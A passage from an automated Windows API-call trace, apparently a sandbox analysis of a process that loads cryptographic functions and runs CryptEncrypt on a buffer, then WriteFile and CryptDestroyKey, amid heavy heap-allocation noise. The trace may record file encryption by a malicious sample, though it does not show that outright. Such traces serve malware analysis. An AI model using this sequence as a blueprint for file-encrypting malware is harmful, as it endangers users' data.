[0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0158.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0158.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0158.579] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x33fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3400) returned 1 [0158.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.580] CharLowerBuffW (in: lpsz="byte[13312]", cchLength=0xb | out: lpsz="byte[13312]") returned 0xb [0158.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.580] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0158.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0158.580] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f14010*, pdwDataLen=0x8cef60*=0x33fc, dwBufLen=0x3400 | out: pbData=0x2f14010*, pdwDataLen=0x8cef60*=0x3400) returned 1 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.581] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0158.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.581] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0158.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.584] WriteFile (in: hFile=0x2d0, lpBuffer=0x3bf0050*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0050*, lpNumberOfBytesWritten=0x8cf5e4*=0x3400, lpOverlapped=0x0) returned 1 [0158.586] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0158.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0158.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0158.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0158.587] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0158.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0158.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0158.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0158.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0158.588] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0158.589] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0158.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0158.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0158.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0158.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0158.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0158.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.591] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0158.591] CryptDestroyKey (hKey=0xa87490) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.591] RtlAllocateHeap 